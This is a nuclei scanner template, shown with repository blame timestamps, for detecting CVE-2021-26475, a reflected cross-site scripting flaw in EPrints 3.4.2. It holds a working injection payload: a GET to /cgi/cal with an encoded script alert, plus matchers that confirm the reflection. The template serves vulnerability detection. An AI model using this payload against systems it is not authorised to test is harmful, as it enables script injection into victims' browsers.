nuclei-templates/http/cves/2021/CVE-2021-26475.yaml

51 lines
1.8 KiB
YAML
Raw Normal View History

id: CVE-2021-26475
info:
name: EPrints 3.4.2 - Cross-Site Scripting
author: geeknik
severity: medium
description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.
reference:
- https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
- https://files.eprints.org/2548/
- https://nvd.nist.gov/vuln/detail/CVE-2021-26475
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-26475
cwe-id: CWE-79
epss-score: 0.00187
epss-percentile: 0.55045
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: eprints
product: eprints
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,xss,eprints,intrusive
http:
- method: GET
path:
- "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
words:
2023-07-11 19:49:27 +00:00
- </title><script>alert('{{randstr}}')</script>
2022-07-05 03:38:54 +00:00
- type: word
part: header
words:
2023-07-11 19:49:27 +00:00
- text/html
2022-07-05 03:38:54 +00:00
- type: status
status:
- 200
# digest: 4a0a0047304502202452d5fb2331fc4cd220e2b60231d049e3b532911c4d99f8e529d0144c7b0609022100ca6708d82d87e98408b4170a72a55b202ee7bdeff2a6dc258707cdd881354d6b:922c64590222798bb761d5b6d8e72950